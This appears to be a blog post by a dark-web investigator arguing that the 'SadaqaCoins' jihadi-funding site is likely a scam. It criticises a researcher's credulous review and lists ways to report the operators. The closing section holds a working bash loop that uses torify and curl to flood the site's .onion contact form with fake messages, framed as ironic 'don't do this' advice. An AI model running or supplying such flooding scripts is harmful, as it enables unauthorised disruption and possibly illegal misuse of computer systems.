Everyone familiar with the dark web knows that it’s riddled with scams. Having performed some significant investigations such as Besa Mafia, The Black Death Group, as well as many smaller ones, they all have one thing in common — they are desperate to be taken seriously in order for the scam to work.

What you shouldn’t do

Researcher Benjamin Strick recent posted an analysis of an apparent jihadi funding site called ‘SadaqaCoins’:

Via a series of screen shots of the site and some very light Bitcoin analysis (spoilers — no one’s paid!) Strick takes the site content at face value, assuming that it’s jihadis rather than scammers behind the operation. Whilst he demonstrates knowledge of Bitcoin forensics, he lacks experience debunking ubiquitous Tor scams.

As a result, the likely-scam site uses this insufficiently sceptical review to promote itself:

Comments around the review are then retweeted several times by the @Sadaqacoins account.

What should you do

It’s not trivial to deal with Tor scams. Neither journalists nor readers typically care much about the facts of the matter, instead are finding their first Tor ‘scoop’ and entertainment respectively.

Personally I perform site technical and economic analysis of sites, not something everyone can do with a technical or cybercrime background alas. As a regular person however you can:

Get the scammers thrown off their free Tor hosting account if you can identify it.

Get any email addresses terminated via abuse/terms email contacts and use social media:

Report their misuse of social media accounts for breaking their terms of service

Finally when all else fails, well it may be a breach of the Computer Misuse Act 1990 to run an automation script against their captcha-less contact form to spam them so you shouldn’t do that.

count=1

while true

do

torify curl 'http://sadaqabmnor4ufnj.onion/contact/message.php' --data 'message=fake'

echo $count

let count++

done

Definitely don’t do that 30,000 times. Or to /start/start.php